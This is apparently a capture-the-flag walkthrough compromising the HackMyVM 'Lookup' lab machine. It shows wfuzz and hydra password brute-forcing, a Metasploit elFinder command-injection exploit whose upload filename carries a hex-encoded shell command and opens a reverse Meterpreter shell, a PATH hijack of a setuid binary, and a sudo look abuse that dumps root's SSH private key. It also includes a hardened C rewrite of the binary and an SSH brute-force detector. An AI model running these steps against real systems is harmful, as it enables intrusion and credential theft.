Target machine: https://hackmyvm.eu/machines/machine.php?vm=Lookup
Visiting it directly produces an error; the domain lookup.hmv has to be added to /etc/hosts first. After that, the home page shows a login form.
Directory scanning turned up no sensitive files and no vulnerabilities, and SQL injection did not work either, so the only option left is brute force, starting with the username. Pay attention to wfuzz's syntax here, in particular the multiple -H options needed to add the required headers.
└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456" --hh 74 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 10177
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000086: 200 0 L 8 W 62 Ch "admin"
000004897: 200 0 L 8 W 62 Ch "jose"
Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0
That gives two usernames; next, brute-force the password for each of them.
└─$ wfuzz -c -w names.txt -w /usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=FUZ2Z" --hh 62 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 25290
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000596: 200 0 L 10 W 74 Ch "admin - password123"
000013241: 302 0 L 0 W 0 Ch "jose - password123"
The valid username and password are the second entry. Entering them on the login page redirects to files.lookup.hmv, so add that domain to /etc/hosts as well. The site turns out to be elFinder, an online file manager.
Checking its version suggests it may be vulnerable. Search for it in msfconsole.
msf6 > search elfinder
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection
4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection
Using the last module gives a shell.
msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set RHOSTS files.lookup.hmv
RHOSTS => files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set lhost 192.168.56.101
lhost => 192.168.56.101
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] Uploading payload 'RaDNuJN.jpg;echo 6370202e2e2f66696c65732f5261444e754a4e2e6a70672a6563686f2a202e6155304230662e706870 |xxd -r -p |sh& #.jpg' (1967 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.aU0B0f.php) ...
[*] Sending stage (39927 bytes) to 192.168.56.130
[+] Deleted .aU0B0f.php
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.130:49188) at 2024-09-24 08:56:59 +0800
...
meterpreter > shell
Process 1734 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/files.lookup.hmv/public_html/elFinder/php
Now let's look at privilege escalation. Start by looking for sensitive files.
find / -perm -u=s 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
...
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
...
The suspicious one is /usr/sbin/pwm. Try running it.
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
pwm can be downloaded to the local machine and decompiled:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+Fh] [rbp-131h]
  FILE *stream; // [rsp+10h] [rbp-130h]
  FILE *v6; // [rsp+18h] [rbp-128h]
  char v7[64]; // [rsp+20h] [rbp-120h] BYREF
  char s[112]; // [rsp+60h] [rbp-E0h] BYREF
  char filename[104]; // [rsp+D0h] [rbp-70h] BYREF
  unsigned __int64 v10; // [rsp+138h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  puts("[!] Running 'id' command to extract the username and user ID (UID)");
  snprintf(s, 0x64uLL, "id");
  stream = popen(s, "r"); // "id" is a bare command name, so it is resolved through the caller's PATH
  if ( stream )
  {
    // Parse "uid=<number>(<name>)" from the command output; the name lands in v7
    if ( (unsigned int)__isoc99_fscanf(stream, "uid=%*u(%[^)])", v7) == 1 )
    {
      printf("[!] ID: %s\n", v7);
      pclose(stream);
      // The file path is built from whatever name the id command printed
      snprintf(filename, 0x64uLL, "/home/%s/.passwords", v7);
      v6 = fopen(filename, "r");
      if ( v6 )
      {
        while ( 1 )
        {
          v4 = fgetc(v6);
          if ( v4 == -1 )
            break;
          putchar(v4);
        }
        fclose(v6);
        return 0;
      }
      else
      {
        printf("[-] File /home/%s/.passwords not found\n", v7);
        return 0;
      }
    }
    else
    {
      perror("[-] Error reading username from id command\n");
      return 1;
    }
  }
  else
  {
    perror("[-] Error executing id command\n");
    return 1;
  }
}
The core of this program is: it runs the system's id command, whose output is expected to contain the standard "uid=<id>(<name>)" text; it matches the name string and then displays the file under /home/<name>. So the key is to construct a fake id command that imitates the real id's output.
PATH=/tmp:$PATH
echo "echo 'uid=1234(think)'" > id
chmod +x id
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
...
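As an added example (not the machine's pwm binary and not the author's code), here is how the same program could have been written so that the PATH trick above has no effect: the caller's identity comes from getuid() and getpwuid_r(), never from an external command; the resolved name is validated before it is spliced into a path; and snprintf truncation is checked. The helper names username_is_safe, resolve_username and passwords_path_for are my own.

```c
/* Hardened rewrite of the pwm logic (added example, not the machine's binary).
 * The user is identified through the passwd database instead of by spawning
 * `id`, so the caller's PATH has no influence on the result. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

/* A user name is only used in a path if it consists of the characters
 * useradd accepts; this rejects values such as "../root" outright. */
int username_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 32)
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = name[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Resolve a uid to its account name with the reentrant getpwuid_r(),
 * never through an external command. Returns 0 on success, -1 if the
 * uid is unknown or the output buffer is too small. */
int resolve_username(uid_t uid, char *out, size_t outlen)
{
    struct passwd pw, *res = NULL;
    char buf[1024];
    if (getpwuid_r(uid, &pw, buf, sizeof buf, &res) != 0 || res == NULL)
        return -1;
    if (strlen(res->pw_name) + 1 > outlen)
        return -1;
    strcpy(out, res->pw_name);
    return 0;
}

/* Build /home/<name>/.passwords, refusing unsafe names and truncation. */
int passwords_path_for(const char *name, char *out, size_t outlen)
{
    if (!username_is_safe(name))
        return -1;
    int n = snprintf(out, outlen, "/home/%s/.passwords", name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* Print the file belonging to the real (not effective) uid.
 * Returns 0 on success, 1 on any failure. */
int print_passwords_for(uid_t uid)
{
    char name[64], path[256];
    if (resolve_username(uid, name, sizeof name) != 0) {
        fputs("[-] Error resolving user name\n", stderr);
        return 1;
    }
    printf("[!] ID: %s\n", name);
    if (passwords_path_for(name, path, sizeof path) != 0) {
        fputs("[-] Refusing to build a path from this user name\n", stderr);
        return 1;
    }
    FILE *f = fopen(path, "r");
    if (!f) {
        printf("[-] File %s not found\n", path);
        return 1;
    }
    int c;                           /* int, so EOF is distinguishable from byte 0xFF */
    while ((c = fgetc(f)) != EOF)
        putchar(c);
    fclose(f);
    return 0;
}

int main(void)
{
    return print_passwords_for(getuid());
}
```

Two further points for a setuid deployment: the fopen() should happen after dropping to the real uid (setuid(getuid())), so a symlink placed in the user's home cannot make the root-privileged binary read files the user could not open on their own; and fgetc() is compared against EOF in an int here, whereas the decompiled loop stores the result in a char and stops early on any 0xFF byte.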
The strings printed by pwm should include think's password; a quick brute-force with them will do.
└─$ hydra -l think -P pass.txt ssh://192.168.56.130 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-24 09:29:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 20 tasks per 1 server, overall 20 tasks, 49 login tries (l:1/p:49), ~3 tries per task
[DATA] attacking ssh://192.168.56.130:22/
[22][ssh] host: 192.168.56.130 login: think password: josemario.AKA(think)
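From the defender's side, the hydra run above leaves a very recognisable trace in sshd's log. The following C program is an added example (not part of the original post) that tallies "Failed password" lines per source address over a constructed set of sshd log lines and reports any address that exceeds a threshold; the sample lines, the second address 10.0.0.5, the threshold and the function names are my own assumptions.

```c
/* Added example (not from the original post): count sshd password failures
 * per source address and flag sources that look like a brute-force run. */
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 16   /* distinct addresses tracked (assumed limit) */
#define THRESHOLD   5    /* failures above which a source is reported (assumed) */

struct source_count {
    char ip[64];
    int  failures;
};

/* Pull the source address out of a line such as
 *   "... sshd[1201]: Failed password for think from 192.168.56.101 port 50001 ssh2"
 * Returns 1 and fills ip on a failed-login line, 0 for anything else
 * (including a source address that would not fit in ip). */
int parse_failed_login(const char *line, char *ip, size_t iplen)
{
    if (strstr(line, "Failed password for") == NULL)
        return 0;
    const char *from = strstr(line, " from ");
    if (from == NULL)
        return 0;
    from += strlen(" from ");
    size_t n = strcspn(from, " ");
    if (n == 0 || n + 1 > iplen)
        return 0;
    memcpy(ip, from, n);
    ip[n] = '\0';
    return 1;
}

/* Tally failures per address over nlines lines. Entries whose count exceeds
 * THRESHOLD are copied to out (at most outlen of them); returns how many. */
int find_bruteforce_sources(const char *const *lines, size_t nlines,
                            struct source_count *out, size_t outlen)
{
    struct source_count table[MAX_SOURCES];
    size_t used = 0;
    char ip[64];

    for (size_t i = 0; i < nlines; i++) {
        if (!parse_failed_login(lines[i], ip, sizeof ip))
            continue;
        size_t j;
        for (j = 0; j < used; j++)
            if (strcmp(table[j].ip, ip) == 0)
                break;
        if (j == used) {
            if (used == MAX_SOURCES)
                continue;                 /* table full: skip rather than overflow */
            strcpy(table[used].ip, ip);   /* ip is under 64 bytes by construction */
            table[used].failures = 0;
            used++;
        }
        table[j].failures++;
    }

    int hits = 0;
    for (size_t j = 0; j < used; j++)
        if (table[j].failures > THRESHOLD && (size_t)hits < outlen)
            out[hits++] = table[j];
    return hits;
}

/* Constructed sample log: six failures from one host, one from another,
 * and a success line that must not be counted. */
const char *const sample_log[] = {
    "Sep 24 09:29:06 lookup sshd[1201]: Failed password for think from 192.168.56.101 port 50001 ssh2",
    "Sep 24 09:29:06 lookup sshd[1202]: Failed password for think from 192.168.56.101 port 50002 ssh2",
    "Sep 24 09:29:06 lookup sshd[1203]: Failed password for think from 192.168.56.101 port 50003 ssh2",
    "Sep 24 09:29:07 lookup sshd[1204]: Failed password for think from 192.168.56.101 port 50004 ssh2",
    "Sep 24 09:29:07 lookup sshd[1205]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2",
    "Sep 24 09:29:07 lookup sshd[1206]: Failed password for think from 192.168.56.101 port 50005 ssh2",
    "Sep 24 09:29:08 lookup sshd[1207]: Failed password for think from 192.168.56.101 port 50006 ssh2",
    "Sep 24 09:29:08 lookup sshd[1208]: Accepted password for think from 192.168.56.101 port 50007 ssh2",
};
const size_t sample_log_len = sizeof sample_log / sizeof sample_log[0];

int main(void)
{
    struct source_count hits[MAX_SOURCES];
    int n = find_bruteforce_sources(sample_log, sample_log_len, hits, MAX_SOURCES);
    for (int i = 0; i < n; i++)
        printf("[!] %s: %d failed SSH logins (threshold %d)\n",
               hits[i].ip, hits[i].failures, THRESHOLD);
    return 0;
}
```

On the sample above it reports 192.168.56.101 with 6 failures; the single failure from 10.0.0.5 and the later successful login are not enough to trigger. The same counting, keyed by address and username, is what fail2ban-style tooling does before it blocks a source.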
The last step is getting root.
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
think@lookup:~$ LFILE=/root/.ssh/id_rsa
think@lookup:~$ sudo look '' "$LFILE"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf/h23TCH7qKRg4Penlti9RKW2XLSB5wR
Qcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM/zDb//ZlnlwCwKQ5XyTQU/vHfROfU0pnR
j7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR/+ybAIVbB+ya/D5r9DYPmatUTLlHD
...